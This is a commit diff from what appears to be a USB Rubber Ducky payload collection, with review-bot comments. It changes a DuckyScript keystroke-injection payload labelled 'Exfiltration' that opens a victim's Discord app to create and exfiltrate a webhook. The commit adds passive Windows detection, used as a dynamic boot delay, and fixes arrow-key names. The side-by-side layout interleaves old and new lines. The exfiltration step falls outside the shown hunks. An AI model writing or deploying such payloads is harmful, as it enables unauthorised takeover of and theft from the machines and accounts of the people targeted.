Merge pull request #476 from aleff-github/patch-88

[+] PASSIVE_WINDOWS_DETECT
pull/366/merge
Peaks 2024-09-02 12:22:54 -04:00 committed by GitHub
commit 0bebb446fd
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed file with 57 additions and 13 deletions


@ -1,25 +1,69 @@
REM ############################################################### REM_BLOCK
REM # | ###############################################################
REM # Title : Create And Exfiltrate A Webhook Of Discord | # #
REM # Author : Aleff | # Title : Create And Exfiltrate A Webhook Of Discord #
REM # Version : 1.0 | # Author : Aleff #
REM # Category : Exfiltration | # Version : 1.0 #
REM # Target : Windows 10-11 | # Category : Exfiltration #
REM # | # Target : Windows 10-11 #
REM ############################################################### # #
###############################################################
END_REM
REM Requirements: REM Requirements:
REM - Internet connection REM - Internet connection
REM - Discord Installed REM - Discord Installed
REM You must define the Discord server name i.e. Hak5 REM You must define the Discord server name i.e. Hak5
DEFINE #SERVER_NAME example DEFINE #SERVER_NAME example
REM You must define your Discord webhook if you want to use this method for the exfiltration REM You must define your Discord webhook if you want to use this method for the exfiltration
DEFINE #DISCORD_WEBHOOK example DEFINE #DISCORD_WEBHOOK example
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
REM Open Discord app REM Open Discord app
GUI GUI
DELAY 1000 DELAY 1000
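Review bot: the extension's documentation block states `$_OS will be set to WINDOWS or NOT_WINDOWS`, but the code assigns `$_OS = #NOT_WINDOWS` with `DEFINE #NOT_WINDOWS 7`, so a caller who follows the docs and compares against a bare `NOT_WINDOWS` is not comparing against the value actually stored; either document that the non-Windows result is the `#NOT_WINDOWS` define (and its value) or drop the define and assign the documented constant directly. Two smaller points in the same block: `VAR $MAX_TRIES = #MAX_WAIT` combined with `DELAY #CHECK_INTERVAL` makes `#MAX_WAIT` an iteration count (150 loops of 20 ms, roughly 3 s in total) rather than a wait time as its name suggests, so renaming it or stating the unit in the `REM CONFIGURATION:` comment would avoid misconfiguration; and nothing in this hunk branches on `$_OS` after `END_EXTENSION`, the payload continues unconditionally into `REM Open Discord app` / `GUI`, so unless a later part of the file consumes `$_OS`, the extension only serves as the dynamic boot delay described in its `USAGE:` text and the OS result is computed but unused.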
@ -74,11 +118,11 @@ TAB
DELAY 500 DELAY 500
TAB TAB
DELAY 500 DELAY 500
DOWN_ARROW DOWNARROW
DELAY 500 DELAY 500
DOWN_ARROW DOWNARROW
DELAY 500 DELAY 500
DOWN_ARROW DOWNARROW
DELAY 500 DELAY 500
ENTER ENTER
DELAY 500 DELAY 500
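Review bot: the commit message `[+] PASSIVE_WINDOWS_DETECT` does not cover this hunk, which is an unrelated key-name correction (`DOWN_ARROW` is not a recognized DuckyScript key, `DOWNARROW` is), so either mention the fix in the PR description or split it into its own commit so the history explains why these three lines changed. The surrounding `TAB` / `DOWNARROW` / `ENTER` sequence still relies on fixed `DELAY 500` steps, which the passive detection added earlier does not make any less timing-dependent; if that navigation was flaky before, this hunk only fixes the key name, not the timing.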